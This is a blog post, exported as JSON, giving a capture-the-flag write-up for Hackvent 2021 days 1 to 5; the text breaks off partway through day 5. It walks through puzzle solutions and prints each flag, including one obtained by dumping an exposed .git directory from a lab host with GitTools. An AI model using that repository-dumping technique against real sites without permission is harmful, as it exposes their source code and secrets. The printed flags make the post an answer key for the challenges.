{"id":1696,"date":"2021-12-28T20:35:19","date_gmt":"2021-12-28T20:35:19","guid":{"rendered":"https:\/\/sigterm.ch\/?p=1696"},"modified":"2022-12-26T19:17:40","modified_gmt":"2022-12-26T18:17:40","slug":"hackvent-2021-write-up","status":"publish","type":"post","link":"https:\/\/sigterm.ch\/?p=1696","title":{"rendered":"HACKvent 2021 Write-up"},"content":{"rendered":"\n<p>Hackvent 2021 is over! <br>Once again, this year&#8217;s Hackvent was terrific &#8211; even though it was uncertain until the start whether it would take place at all. Eventually, the event was a traditional, full-blown Hackvent! Thanks to all challenge contributors who made this possible. I especially loved both Blockchain challenges, the binary exploitation on day 14, and the reverse engineering challenge on day 22. Less pleasant was the fact that some challenges were very resource-intensive this year. Some challenges took several hours of computing time on my laptop.<br>This year I did manage to complete all the challenges. Unfortunately, not all of them within 24 hours to get the total score. I submitted the flag for three challenges late (day 10, 17, and 19). And like every year, I liked the discussions around the CTF very much. 
Shouts to ice, jokker, ludus, DrSchottky, and all other participants.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"320\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1024x320.png\" alt=\"\" class=\"wp-image-1697\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1024x320.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-300x94.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-768x240.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1536x480.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2048x639.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">https:\/\/ranking.competition.hacking-lab.com\/<\/figcaption><\/figure>\n\n\n\n<!--more-->\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.01] X-wORd Puzzle<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"832\" height=\"102\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1.png\" alt=\"\" class=\"wp-image-1698\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1.png 832w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1-300x37.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-1-768x94.png 768w\" sizes=\"auto, (max-width: 832px) 100vw, 832px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>It seems the elves have sent us a message via a newspaper crossword puzzle. 
Can you solve it to find out what they want to tell us?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"793\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1024x793.png\" alt=\"\" class=\"wp-image-1699\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1024x793.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-300x232.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-768x595.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536-1536x1189.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/cb6e641a-5acf-4c2d-9d4f-380a45aad536.png 1790w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Instructions<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Fill in the puzzle in all capital letters<\/li>\n\n\n\n<li>The initial letters of each word are the solution &#8211; in the same order the questions are asked:\n<ul class=\"wp-block-list\">\n<li>horizontal words: top to bottom<\/li>\n\n\n\n<li>vertical words: left to right<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Horizontal<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A diagram of arrows not allowing cycles<\/li>\n\n\n\n<li>A handbag for carrying around money<\/li>\n\n\n\n<li>Very, very secure<\/li>\n\n\n\n<li>Golf: number of strokes required<\/li>\n\n\n\n<li>Congo between 1971 and 1997<\/li>\n\n\n\n<li>State of appearing everywhere<\/li>\n\n\n\n<li>Tuples in everyday language<\/li>\n\n\n\n<li>Makes you laugh or silences you<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Vertical<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Plea by many doctors right now<\/li>\n\n\n\n<li>Put in parcels<\/li>\n\n\n\n<li>Lets 
you change user<\/li>\n\n\n\n<li>&#8230;-test<\/li>\n\n\n\n<li>How you should transmit your data<\/li>\n\n\n\n<li>Need to squash them &#8211; fix your code!<\/li>\n\n\n\n<li>Attributed to a marquis &#8211; no pain, no gain.<\/li>\n\n\n\n<li>Doing something in a way that causes fatigue is doing it&#8230;<\/li>\n\n\n\n<li>A drink you may need after finishing this puzzle.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>the words are in order (ltr &amp; ttb): first hint is for the top left horizontal word<\/li>\n\n\n\n<li>number means number of chars in word<\/li>\n\n\n\n<li>check the title &#8211; do you need all the letters?<\/li>\n\n\n\n<li>we know how to hide gridlines<\/li>\n\n\n\n<li>what seems redundant really isn&#8217;t &#8211; it&#8217;s the key you seek<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>With Google and the instructions it was more or less straightforward to find most of the needed words. <br>It was unclear how to generate the flag in the end, though. According to the hint in the picture (XOR sign), the challenge category (crypto) and the title (XOR), it became obvious at some point that an XOR operation had to be computed. After some guessing I found out that the initial letter of each word had to be XORed with the character length of the word. The number needs to be interpreted in ASCII, not as a number. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"589\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1024x589.jpeg\" alt=\"\" class=\"wp-image-1755\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1024x589.jpeg 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-300x173.jpeg 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-768x442.jpeg 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1-1536x883.jpeg 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/words-1-1.jpeg 1749w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I created an additional Excel file to help me solve this challenge. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-44-1-1024x420.png\" alt=\"\" class=\"wp-image-1756\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{welcometohackvent}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.02] No source, No luck!<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"102\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2.png\" alt=\"\" class=\"wp-image-1700\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2-300x37.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-2-768x95.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>explo1t<\/em>. 
There were no elves harmed during its creation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Now they&#8217;re just trolling you, aren&#8217;t they? They said there would be a flag, but now they&#8217;re not even talking to us for real, just shoving us along \ud83d\ude24 No manners, they got!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>If we visit the website we get &#8220;rick-rolled&#8221; by being redirected to this <a rel=\"noreferrer noopener\" href=\"https:\/\/www.youtube.com\/watch?v=dQw4w9WgXcQ\" target=\"_blank\">YouTube video<\/a>. Analyzing the link with curl led straight to the flag:<\/p>\n\n\n<p>$ curl 2022e71f-12f7-4d18-8b0c-51b42d14d349.idocker.vuln.land -v -L<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-5-1024x400.png\" alt=\"\" class=\"wp-image-1703\"\/><\/figure>\n\n\n\n<p>We can see that the file style.css is loaded. Let&#8217;s look closer at the CSS file: <\/p>\n\n\n<p>$ curl 2022e71f-12f7-4d18-8b0c-51b42d14d349.idocker.vuln.land\/style.css -v -L<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-989x1024.png\" alt=\"\" class=\"wp-image-1702\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-989x1024.png 989w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-290x300.png 290w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4-768x795.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-4.png 1400w\" sizes=\"auto, (max-width: 989px) 100vw, 989px\" \/><\/figure>\n\n\n\n<p>The flag is just there in the &#8220;body::after&#8221; element.<\/p>\n\n\n\n<p><strong>Flag<\/strong><\/p>\n\n\n\n<p>HV21{h1dd3n_1n_css}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 
class=\"wp-block-heading\">[HV21.03] Too Much GlItTer!<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"110\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6.png\" alt=\"\" class=\"wp-image-1705\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-6-768x103.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>HaCk0<\/em>. The reindeer helped!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>To celebrate Christmas even more the elves have setup a small website to help promote christmas on the internet. It is currently under heavy development but they wanted to show it off anyhow.<\/p>\n\n\n\n<p>Unfortunately they made a pretty silly error which threatens the future of their project.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help them find the vulnerability and retrieve the flag?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>When we open the URL this website is presented to us:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"675\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1024x675.png\" alt=\"\" class=\"wp-image-1706\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1024x675.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-300x198.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-768x506.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-1536x1013.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-7-2048x1350.png 
2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>According to the challenge title it was very clear to me that this challenge has something to do with Git. Consequently, I tried to browse to the .git directory. And voil&agrave;:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"526\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-1024x526.png\" alt=\"\" class=\"wp-image-1707\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-1024x526.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-300x154.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8-768x395.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-8.png 1486w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The next steps are very straightforward. I used <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/internetwache\/GitTools\" target=\"_blank\">GitTools<\/a> to download all commits and branches of the repository and looked for the flag with grep. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/Dumper\/gitdumper.sh 87bb6e71-a303-4ea8-9a9c-90de760d0c97.idocker.vuln.land\/.git\/ git<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-48-1024x913.png\" alt=\"\" class=\"wp-image-1760\"\/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/Extractor\/extractor.sh git\/ extr\/<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-47-1024x435.png\" alt=\"\" class=\"wp-image-1759\"\/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ grep -Rnsi \"HV{\" extr\/\nextr\/1-b009ea9155d990aa9185e1157aaf583a636e93fd\/flag.html:63:        &lt;span style=\"font-size: 12pt !important;\">Here is the flag: HV{n3V3r_Sh0w_Y0uR_.git}&lt;\/span><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{n3V3r_Sh0w_Y0uR_.git}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.04] Christmas in Babylon<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"108\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9.png\" alt=\"\" class=\"wp-image-1708\" 
srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9-300x39.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-9-768x100.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>2d3<\/em>. They understand all the elves!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Something weird happened to the elves, suddenly when one says something, there&#8217;s a number of the others required to translate what they mean. It only becomes clear in the end.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help Santa understand what&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/03960b75-2139-47ca-9b99-0cf6b4ec6c60.zip\" target=\"_blank\" rel=\"noreferrer noopener\">they&#8217;re saying<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p><a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.py\" target=\"_blank\" rel=\"noreferrer noopener\">Step 1 &#8211; C# &#8211; Decode with Python<\/a>:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import base64\n'''\nusing System;\nusing System.Text;\nusing static System.Console;\nvoid Rev(string s){\nvar chars=Encoding.ASCII.GetString(Convert.FromBase64String(s)).ToCharArray();\nArray.Reverse(chars);WriteLine(new string(chars));\n}'''\ndef Rev(inp):\n\tdecoded = 
base64.b64decode(inp).decode('utf-8')\n\tprint(decoded[::-1])\nRev(\"KzgrKitoKysrKysreysrKysraSsvPiswK3krKz4oKysrKysrICsrPlQrKysrKysrKyt9KysrPlsrVCsrK3grKysr\");\nRev(\"K2srICsrKysyKyt9KysrKysrPisrKytVKysrKysrKysrPisrNSsrKysrK3wrKysrNT4rKysrRCs2KytyKysqKz4r\");\nRev(\"K0MrKysrKysrMj4rKytqKyArKysrKytMKysrICsrbys+KysrKysrKysrKys+KysgKytNKysraStQKysrditxKys+\");\n...<\/pre>\n\n\n\n<p>Step 2 &#8211; Running the Python-scripts results in <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.bf\" target=\"_blank\">Brainfuck-Code<\/a>. We can run this code on the website <a rel=\"noreferrer noopener\" href=\"https:\/\/copy.sh\/brainfuck\/\" target=\"_blank\">https:\/\/copy.sh\/brainfuck\/<\/a>.<\/p>\n\n\n\n<p>Step 3 &#8211; The Brainfuck code returns a <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.sh\" target=\"_blank\">Bash-script<\/a>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ .\/code.sh > code.c<\/pre>\n\n\n\n<p>Step 4 &#8211; The <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.c\" target=\"_blank\">next output<\/a> is a Python script and a C code at the same time. The Python code wants a password. Let&#8217;s try with C first:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ gcc -o code code.c\n$ .\/code\nC+Python=Cython?<\/pre>\n\n\n\n<p>Step 5 &#8211; We use the output from the compiled C program as input for the Python script. 
(This took me a while to guess.)<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ python3 code.c > code.php\nC+Python=Cython?<\/pre>\n\n\n\n<p>Step 6 &#8211; The output of the Python script is a <a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.php\" target=\"_blank\" rel=\"noreferrer noopener\">PHP file<\/a>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ php code.php > code.js<\/pre>\n\n\n\n<p>Step 7 &#8211; The last file we got is a <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/code04.js\" target=\"_blank\">JavaScript file<\/a> &#8211; although it is not readable at all (<a rel=\"noreferrer noopener\" href=\"https:\/\/jsfuck.com\" target=\"_blank\">jsfuck.com<\/a>). We can execute it in <a rel=\"noreferrer noopener\" href=\"https:\/\/jsfiddle.net\" target=\"_blank\">https:\/\/jsfiddle.net<\/a> and get the flag. 
<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{-T00-many-weird-L4NGU4GE5-}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.05] X-Mas Jumper<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"112\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10.png\" alt=\"\" class=\"wp-image-1710\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10.png 834w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-10-768x103.png 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>monkey<\/em>. Tight knitting!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have been getting into the festive spirit by making Christmas jumpers for themselves to wear in the workshop. 
They made one for Santa too, but it looks like they didn&#8217;t program the knitting machine correctly.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"494\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1024x494.png\" alt=\"\" class=\"wp-image-1716\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1024x494.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-300x145.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-768x371.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16-1536x741.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-16.png 1766w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you untangle this mess and find the pattern they were trying to make?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I manually wrote down the pattern as follows: white -&gt; 0, red -&gt; 1. I ignored the two rows on each side. 
This results in this binary pattern:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">111001111110011100101111111000000000001000010010\n000100100100100100000000000100001001000010010010\n010010011000110011111100100001010000001000010010\n100101000010001001000100000100001001010010100001\n000100100010000010000100101001010000100001100001\n000001000010010100111100111000100000010001110000\n110001100000000000000000000000000000000000000000\n000011100110011100000000000111000000000000100010\n010001000000000001000000000000010010000001001101\n110110100000000000001110000011000010010010010000\n000000000100100000010001001001001000000000000010\n010000001001001001001000000000000001001000100010\n001101100010000111111001110011001110000010100011\n111100000000000000000000000000000000000000000000\n001111111001111001111100000000000000000010000101\n000010010001000000000000000001111000100011001000\n010000000000000000100100010010100100001000000000\n000000010000001010010010001000000000000000001000\n000110001001111000000000000000000100000010000100\n100010000000011111100111000000111100110001001111\n110000000000000000000000000000011000000110000110\n000000011100000000000010010001000010000000000100\n000000000011100100100001001000100010000000111001\n110010001000101100110001000000100010111000100011\n110010001000100000011111001000100000001001000100\n010000001000000100010000001000100010001000010100\n010000001001111000001110101111110001110001001000<\/pre>\n\n\n\n<p>In a next step I replaced the 1 with a black unicode block and the 0 with a white unicode block. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b
